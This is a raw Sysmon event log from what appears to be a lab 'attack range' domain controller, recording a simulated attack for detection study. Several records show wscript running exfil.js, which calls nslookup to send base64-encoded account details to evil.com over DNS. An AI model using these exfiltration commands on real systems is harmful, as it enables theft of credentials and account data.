23542300x8000000000000000210389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.713{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwuggg.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-18EF-629A-3944-000000005F02}6408408C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3A44-000000005F02}724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3A44-000000005F02}724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.681{2E1864BB-18EF-629A-3844-000000005F02}47964804C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-3A44-000000005F02}724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.686{2E1864BB-18EF-629A-3A44-000000005F02}724C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-3844-000000005F02}4796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwuggg.tmp 2>&1 10341000x8000000000000000210380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.660{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3944-000000005F02}6408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.660{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3944-000000005F02}6408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.644{2E1864BB-18EF-629A-3944-000000005F02}6408408C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3844-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.644{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3944-000000005F02}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3844-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-18E0-629A-6742-000000005F02}39765232C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-3844-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.638{2E1864BB-18EF-629A-3844-000000005F02}4796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwuggg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.629{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrvu.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.597{2E1864BB-18EF-629A-3644-000000005F02}73807452C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3744-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3744-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.582{2E1864BB-18EF-629A-3544-000000005F02}70605604C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-3744-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.592{2E1864BB-18EF-629A-3744-000000005F02}3916C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-3544-000000005F02}7060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrvu.tmp 2>&1 10341000x8000000000000000210360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.559{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3644-000000005F02}7380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.559{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3644-000000005F02}7380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.544{2E1864BB-18EF-629A-3644-000000005F02}73807452C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3544-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 